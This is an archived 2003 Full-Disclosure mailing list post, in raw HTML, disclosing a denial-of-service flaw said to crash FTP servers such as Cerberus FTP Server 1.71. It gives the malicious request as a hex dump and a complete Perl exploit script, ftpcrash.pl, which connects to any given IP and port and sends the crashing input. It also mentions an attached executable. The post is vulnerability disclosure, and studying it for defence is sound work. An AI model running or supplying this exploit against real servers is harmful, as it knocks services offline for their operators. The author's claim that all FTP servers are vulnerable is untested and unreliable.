[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] FTPServer Denial Of Service Vulnerability

To: <vuln@secunia.com>, <full-disclosure@lists.netsys.com>
Subject: [Full-Disclosure] FTPServer Denial Of Service Vulnerability
From: "Florian Rock" <florianrock@web.de>
Date: Mon, 18 Aug 2003 15:03:45 +0200

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2800.1170" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>I</FONT><FONT face=Arial size=2>&nbsp;have found a 
very serious hole in FTPServer<BR>The Exploit is tested on Cerberus FTP Server 
1.71 and a own coded, but I think all FTPServer are Vulnerable</FONT></DIV>
<DIV><FONT face=Arial size=2>Sorry but i have to less ftpserver to 
test</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
<DIV><FONT face=Arial size=2>And so it Works<BR>Typical 
request:<BR>00000000&nbsp; 55 73 65 72 20 53&nbsp; 68 75 74 64 6f 77 6e 0d 
0a&nbsp;&nbsp;&nbsp; User Shutdown..</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
<DIV><FONT face=Arial size=2>Exploit request:<BR>00000000&nbsp; 0d 0a 55 73 65 
72 20 53&nbsp; 68 75 74 64 6f 77 6e&nbsp;&nbsp;&nbsp; ..User 
Shutdown</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=Arial size=2>I've coded an exploit:<BR>See attached file: 
ftpcrash.exe (ziped) for people how have no perl</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=Arial size=2>My exploit (in 
perl):<BR>[code]<BR>-ftpcrash.pl-<BR>print "Exploit for FTP-Server\n";<BR>print 
"&nbsp;&nbsp; by The real Remoter\n";<BR>my $usage = "\nftpcrash &lt;IP&gt; 
&lt;Port&gt;\n";<BR>die "$usage" unless $ARGV[0] &amp;&amp; $ARGV[1];<BR>use 
Socket;<BR>my $remote = $ARGV[0];<BR>my $port = $ARGV[1];<BR>my $iaddr = 
inet_aton($remote);<BR>my $proto = getprotobyname("tcp");<BR>my $paddr = 
sockaddr_in($port, $iaddr);<BR>socket(SOCK, PF_INET, SOCK_STREAM, 
$proto);<BR>connect(SOCK, $paddr) or die "Can't connect to " . $remote;<BR>print 
"Sending exploit\n";<BR>$msg = "\x0d\x0a";<BR>$msg = $msg . "User 
Shutdown";<BR>send(SOCK,$msg, 0) or die "Can't send 
Exploit";<BR>sleep(1);<BR>print "Server 
Crashed!";<BR>sleep(1);<BR>exit;<BR>[/code]</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
<DIV><FONT face=Arial size=2>Sorry for my bad english (I'm german)</FONT><FONT 
face=Arial size=2><FONT size=1></DIV></FONT></FONT></BODY></HTML>

ftpcrash.zip

Follow-Ups:
- Re: [Full-Disclosure] FTPServer Denial Of Service Vulnerability
  - From: "Andreas Gietl" <a.gietl@e-admin.de>
- RE: [Full-Disclosure] FTPServer Denial Of Service Vulnerability
  - From: "Aditya [Aditya Lalit Desgmukh]" <aditya@online.gr8domain.biz>

Prev by Date: RE: [Full-Disclosure] [UPDATE] ping floods
Next by Date: RE: [Full-Disclosure] Automating patch deployment
Prev by thread: Re: [Full-Disclosure] Re: [Dshield] new msblaster on the loose?
Next by thread: Re: [Full-Disclosure] FTPServer Denial Of Service Vulnerability
Index(es):
- Date
- Thread